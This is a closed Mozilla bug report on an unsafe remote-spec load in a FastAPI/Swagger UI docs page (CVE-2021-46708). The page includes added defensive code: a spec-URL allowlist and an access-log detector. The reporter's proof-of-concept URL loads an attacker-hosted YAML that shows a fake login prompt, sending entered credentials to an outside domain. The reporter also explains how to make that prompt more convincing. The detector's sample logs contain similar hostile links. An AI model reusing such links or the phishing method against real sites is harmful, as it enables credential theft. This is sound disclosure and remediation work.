Closed Bug 1783267 Opened 2 years ago Closed 2 years ago

External authentication prompt injection via unsafe remote file include at https://ctms.prod.mozilla-ess.mozit.cloud/docs

Categories

(Websites :: Other, task)

Tracking

(Not tracked)

RESOLVED FIXED

People

(Reporter: todayisnew, Unassigned)

References

()

Details

(Keywords: reporter-external, sec-high, wsec-authentication, Whiteboard: [reporter-external] [web-bounty-form] [verif?])

Attachments

(1 file)

Good day, I truly hope it treats you great on your side of the screen :)

I have found that you have a site which is vulnerable to a remote file include to an arbitrary host - in this case, I am able to load my own content from todayisnewpoc.surge.sh.

There is sanitization of the data being loaded from todayisnewpoc.surge.sh, which can prevent some common attack vectors/known payloads, but I am still able to inject a custom authentication prompt which loads when visiting the page.

This prompt is being served from an arbitrary location (authorization.site), which can be modified as needed to be as convincing as possible to any possible victim. Imagine yourdomain.authorization.site, for example. Depending on the browser being used, a message can be included along with the prompt to make it seem more trustworthy.

When a victim enters their information into the prompt, it is sent to the arbitrary location being used by the attacker (authorization.site) along with their IP address, and stored in plain text for the attacker to use when desired.

Additionally, if the victim closes the first prompt, an attacker can serve arbitrary text on the page to encourage them to authorize. If they do so by clicking on the Authorize button, then clicking on the subsequent Authorize button, the victim will again be shown my external authentication prompt from authorization.site.

POC:

https://ctms.prod.mozilla-ess.mozit.cloud/docs?url=https://todayisnewpoc.surge.sh/auth2.yaml

How to fix: Restrict the ability to load external json/yaml files via the configUrl and url parameters, or implement an allowed-list for domains which can load via these parameters.

May you be well on your side of the screen :)

-Eric

Flags: sec-bounty?
See Also: → 1783266
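An added example (not CTMS code and not from the report above) of the allowlist that the "How to fix" line asks for: FastAPI's built-in /docs route is disabled and a custom route decides which OpenAPI document Swagger UI is told to load, rejecting anything that is not a same-origin path or an https URL on an allowlisted host. It assumes a swagger-ui bundle that ignores query-string configuration (4.1.3 or later), so the server alone controls the spec URL that reaches the page; with an older bundle the client-side JS would still read the query string, so upgrading remains the primary fix. ALLOWED_SPEC_HOSTS and api.example.test are constructed placeholders, and the validator itself is stdlib-only so it runs without FastAPI installed.

```python
"""Serve Swagger UI only for an allowlisted OpenAPI document.

Added example, not CTMS or FastAPI project code. Assumes a swagger-ui
bundle (4.1.3+) that ignores query-string configuration, so the server
alone decides which spec URL ends up in the page.
"""
from typing import Optional
from urllib.parse import urlsplit

try:
    from fastapi import FastAPI, HTTPException
    from fastapi.openapi.docs import get_swagger_ui_html
except ImportError:  # the validator below is stdlib-only and still usable
    FastAPI = None

# Hosts permitted to serve a spec to the docs page (constructed placeholder).
ALLOWED_SPEC_HOSTS = frozenset({"api.example.test"})


def is_allowed_spec_url(url: str, allowed_hosts=ALLOWED_SPEC_HOSTS) -> bool:
    """True only for a same-origin absolute path or an https URL on an allowlisted host.

    Rejects the forms a browser would resolve to another origin:
    scheme-relative "//host/...", backslashes (browsers treat "\\" as "/"),
    userinfo tricks such as "https://allowed@evil/", and non-https schemes.
    """
    if not url or len(url) > 2048 or "\\" in url or any(c.isspace() for c in url):
        return False
    try:
        parts = urlsplit(url)
    except ValueError:  # e.g. malformed IPv6 literal
        return False
    if parts.scheme == "" and parts.netloc == "":
        # Relative reference: must be an absolute path on our own origin.
        return url.startswith("/")
    if parts.scheme.lower() != "https":
        return False
    if parts.username is not None or parts.password is not None:
        return False
    return (parts.hostname or "").lower() in allowed_hosts


def create_app():
    """Build an app whose /docs never renders an attacker-supplied spec."""
    if FastAPI is None:
        raise RuntimeError("FastAPI is not installed")
    app = FastAPI(docs_url=None)  # turn off the built-in docs route

    @app.get("/docs", include_in_schema=False)
    async def docs(url: Optional[str] = None):
        # The server, not the query string, decides which spec the UI loads.
        spec = url or app.openapi_url
        if not is_allowed_spec_url(spec):
            raise HTTPException(status_code=400, detail="spec URL not permitted")
        return get_swagger_ui_html(openapi_url=spec, title=f"{app.title} - docs")

    @app.get("/")
    async def root():
        return {"message": "Hello World"}

    return app


if __name__ == "__main__":
    import uvicorn  # assumed installed alongside FastAPI

    uvicorn.run(create_app(), host="127.0.0.1", port=8000)
```

If a deployment never needs to show a foreign spec, the simplest hardening is to leave the allowlist empty and drop the `url` parameter from the route entirely, so the page always embeds `app.openapi_url`.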

This appears to be caused by us using an outdated version of FastAPI.

I was able to reproduce the bug by:

  • pip installing fastapi==0.74.1 (version currently used in CTMS) and uvicorn
  • making a minimal FastAPI app:

        # Minimal app; saved as main.py so that "uvicorn main:app" finds it
        from fastapi import FastAPI

        app = FastAPI()


        @app.get("/")
        async def root():
            return {"message": "Hello World"}

  • starting the app:

        uvicorn main:app

  • navigating to http://127.0.0.1:8000/docs?url=https://todayisnewpoc.surge.sh/auth2.yaml

After pip installing fastapi==0.79.0 though, the url param seems to be ignored and no authorization popup appears.

Status: UNCONFIRMED → NEW
Ever confirmed: true

The URL provided in the POC no longer triggers the authorization popup after releasing v1.8.1

https://ctms.prod.mozilla-ess.mozit.cloud/docs?url=https://todayisnewpoc.surge.sh/auth2.yaml

Status: NEW → RESOLVED
Closed: 2 years ago
Resolution: --- → FIXED
Attached image ctms-prod-ui.png

Adding a screenshot of some part of the flow

The reason this fastapi upgrade fixed the issue is that in fastapi version 0.75.2 a change was added which upgrades swagger-ui from version 3.52.5 to 4.1.3.

This upgrade to swagger-ui includes the fix which mitigates CVE-2021-46708, which is what this bug is reporting.

Note from the issue in swagger-ui, https://github.com/swagger-api/swagger-ui/issues/4872, which explains the attack reported in this bug:

Additionally, the URL parameter is dangerous in general because it allows an attacker to provide a similar schema file that instead sends authorization requests to a server under an attacker’s control, which makes it much easier to trick a user into leaking their login credentials. So the URL parameter should not be allowed in any setting where authentication or other sensitive information is used. I’d recommend disabling it by default and cautioning users against enabling it.

Flags: sec-bounty? → sec-bounty+
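As a companion on the detection side (an added example, not from the bug thread or from swagger-ui): a scan over web-server access logs for /docs requests that pass an external host in the url or configUrl parameter, which is the pattern the quoted swagger-ui issue describes. It handles percent-encoded values, scheme-relative "//host" forms and the backslash variant browsers normalise to "/". The combined-format log lines in SAMPLE_LOG, the ctms.example.test value in OWN_HOSTS and evil.example are constructed placeholders.

```python
"""Flag /docs requests whose url/configUrl parameter points at an external host.

Added example, not from the bug thread. Works on Apache/nginx "combined"
access logs; SAMPLE_LOG and OWN_HOSTS are constructed placeholders.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Hosts this service itself serves specs from (constructed placeholder).
OWN_HOSTS = frozenset({"ctms.example.test"})

# Query parameters swagger-ui accepted for loading a remote spec or config
# (both are named in the report above).
SPEC_PARAMS = ("url", "configUrl")

# Apache/nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

# Constructed sample: one external load via url=, one plain docs hit,
# one same-origin spec, one external load via percent-encoded configUrl=.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Aug/2022:10:15:01 +0000] "GET /docs?url=https://todayisnewpoc.surge.sh/auth2.yaml HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Aug/2022:10:15:02 +0000] "GET /docs HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [04/Aug/2022:10:15:03 +0000] "GET /docs?url=%2Fopenapi.json HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
198.51.100.7 - - [04/Aug/2022:10:16:00 +0000] "GET /docs?configUrl=%2F%2Fevil.example%2Fcfg.json HTTP/1.1" 200 1234 "-" "curl/7.85.0"
"""


def external_spec_host(value: str, own_hosts=OWN_HOSTS):
    """Return the foreign host a spec value would load from, or None if same-origin."""
    if "\\" in value:  # browsers treat "\" as "/", so "/\\evil" is scheme-relative
        value = value.replace("\\", "/")
    try:
        parts = urlsplit(value)
    except ValueError:
        return "<unparsable>"  # cannot be same-origin with confidence; report it
    host = (parts.hostname or "").lower()
    if not host or host in own_hosts:
        return None
    return host


def find_external_spec_loads(lines, own_hosts=OWN_HOSTS):
    """Scan log lines; return one finding per external spec/config load on /docs."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not query or path.rstrip("/") != "/docs":
            continue
        for param, values in parse_qs(query).items():
            if param not in SPEC_PARAMS:
                continue
            for value in values:
                host = external_spec_host(value, own_hosts)
                if host is not None:
                    findings.append({
                        "ip": m.group("ip"), "ts": m.group("ts"),
                        "param": param, "spec_host": host, "value": value,
                    })
    return findings


if __name__ == "__main__":
    for f in find_external_spec_loads(SAMPLE_LOG.splitlines()):
        print(f"{f['ts']} {f['ip']} loaded external spec via {f['param']}= from {f['spec_host']}")
```

A hit is only evidence that the link was requested, not that credentials were entered; the value of the scan is in surfacing which hosts are being used in such links and who was sent to them, which is what an incident responder needs to reach affected users. If the docs page is mounted under a path prefix, adjust the `/docs` path comparison accordingly.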

todayisnew, thanks very much for the report. Tom will follow up with you to coordinate payment for the bounty award.

Group: websites-security
